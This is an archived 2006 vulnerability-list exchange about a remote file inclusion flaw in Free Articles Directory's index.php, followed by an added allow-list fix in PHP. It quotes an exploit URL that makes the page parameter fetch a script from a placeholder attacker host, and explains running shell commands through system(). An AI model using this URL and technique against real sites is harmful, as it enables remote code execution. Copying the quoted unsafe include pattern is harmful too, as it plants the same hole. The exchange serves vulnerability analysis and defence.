[VIM] Free Articles Directory - file inclusion, code execution?

George A. Theall theall at tenablesecurity.com
Wed Mar 22 09:58:27 EST 2006


Josh Zlatin wrote:

> Looks to me like a clarification, meaning:
> http://[target]/index.php?page=http://[attacker]/evilscript
> 
> opens and runs the php script (note the following code in index.php
> though: include($_GET["page"].".php");

Yes, it does appear to be a remote file include flaw. From index.php,
you have:

  if ($_GET["page"]=='')
  ...
  else
  	{
  		include($_GET["page"].".php");
  	}

> I was unable to run uname -a or any other command I tried via the cmd
> command, but that is probably because the 'cmd' variable is defined as
> the result of the following SQL query:

Actually, it just is passed to whatever URL you pass in via the page
parameter. So all you'd need to run code is a PHP script that calls
system() with the value of cmd.

George
--
theall at tenablesecurity.com
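
An added example, not part of the original message and not code from Free Articles Directory: one way to replace the include($_GET["page"].".php") call quoted above with an allow-list lookup, so the page parameter can only ever select a known local file. The page names, the pages/ directory and the fallback to 'home' for an empty parameter are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for include($_GET["page"].".php").
// Page names, the pages/ directory and the 'home' default are assumptions,
// not taken from the application discussed in the thread.

// Accepted page names mapped to local files; anything else is rejected.
const PAGES = [
    'home'    => 'home.php',
    'search'  => 'search.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page name to a file under $baseDir.
 * Returns the absolute path, or null when the name is not allow-listed.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Arrays (?page[]=x) and other non-strings are rejected outright.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $root = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    // Defence in depth: the resolved file must exist inside $baseDir.
    if ($root === false || $path === false
        || strpos($path, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$page = $_GET['page'] ?? '';
$file = resolve_page($page === '' ? 'home' : $page, __DIR__ . '/pages');
if ($file === null) {
    // URLs, traversal sequences and unknown names all end up here.
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

Setting allow_url_include to Off in php.ini blocks the remote-URL form of the include but not local paths, so the allow-list is still needed.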